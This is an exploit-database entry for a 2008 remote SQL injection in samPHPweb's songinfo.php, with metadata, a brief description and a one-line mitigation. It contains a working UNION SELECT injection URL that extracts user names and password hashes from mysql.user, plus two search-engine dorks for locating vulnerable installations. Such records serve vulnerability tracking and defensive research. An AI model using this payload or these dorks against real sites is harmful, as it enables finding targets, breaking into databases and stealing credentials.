header-logo
Suggest Exploit
vendor:
samPHPweb
by:
BackDoor
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: samPHPweb
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:spacialaudio:samphpweb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

samPHPweb (songinfo.php) Remote SQL Injection

A remote SQL injection vulnerability exists in the songinfo.php script of samPHPweb. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script with the songid parameter set to a malicious value. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially resulting in the disclosure of sensitive information.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Title:samPHPweb (songinfo.php) Remote SQL Injection
Script:samPHPweb
Download:http://www.spacialaudio.com/download/samPHPweb.zip
Bug:songinfo.php
Author:BackDoor
Dork1:inurl:samPHPweb/playing.php
Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
Exploit:
www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user

# milw0rm.com [2008-01-05]